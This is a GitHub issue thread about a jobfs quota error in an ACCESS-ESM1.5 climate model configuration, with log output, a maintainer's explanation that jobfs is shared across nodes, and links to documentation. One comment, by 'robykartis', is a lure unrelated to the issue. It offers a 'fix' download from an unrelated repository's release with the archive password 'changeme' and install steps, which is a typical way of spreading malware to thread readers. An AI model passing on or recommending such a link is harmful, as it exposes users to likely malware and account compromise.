### ISSUE TITLE
Increase JOBFS for configurations

### ISSUE THREAD

**Issue by blimlim** [ACCESS-NRI/access-esm1.5-configs#83]
I came across a `jobfs` quota exceeded error when running the `historical+concentrations` configuration for several years. It's not completely clear when in the run it happened, but I think it might have been during the `setup` stage:
```
Setting up ice
Setting up coupler
Checking exe, input and restart manifests
Job 123620242.gadi-pbs killed due to exceeding jobfs quota. Quota: 100.0MB, Used: 435.49MB, Host: gadi-cpu-clx-2284
```
At the bottom of the resource report it also has
```
 JobFS requested:    800.0MB                JobFS used: 672.63MB    
```

Rerunning got past the issue, but it could be good to increase the `jobfs` requested to try and avoid the error happening during long simulations.

**Comment by robykartis** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by aidanheerdegen** [comment]
Note that jobfs is shared over nodes

https://opus.nci.org.au/display/Help/PBS+Directives+Explained#PBSDirectivesExplained--ljobfs=%3C10GB%3E

On 48 cpu nodes ACCESS-ESM1.5 uses 8 nodes. If the JOBFS is used in setup it will only be the root node, so the usage will be concentrated on a single node.

Dale wrote a very nice explainer of JOBSFS in case anyone is interested

https://climate-cms.org/posts/2022-11-10-jobfs.html

(put this in a comment on the PR, but meant to chuck it here)

**Comment by blimlim** [comment]
The explainer is really helpful! Closing this issue now that #84 and #85 are merged.
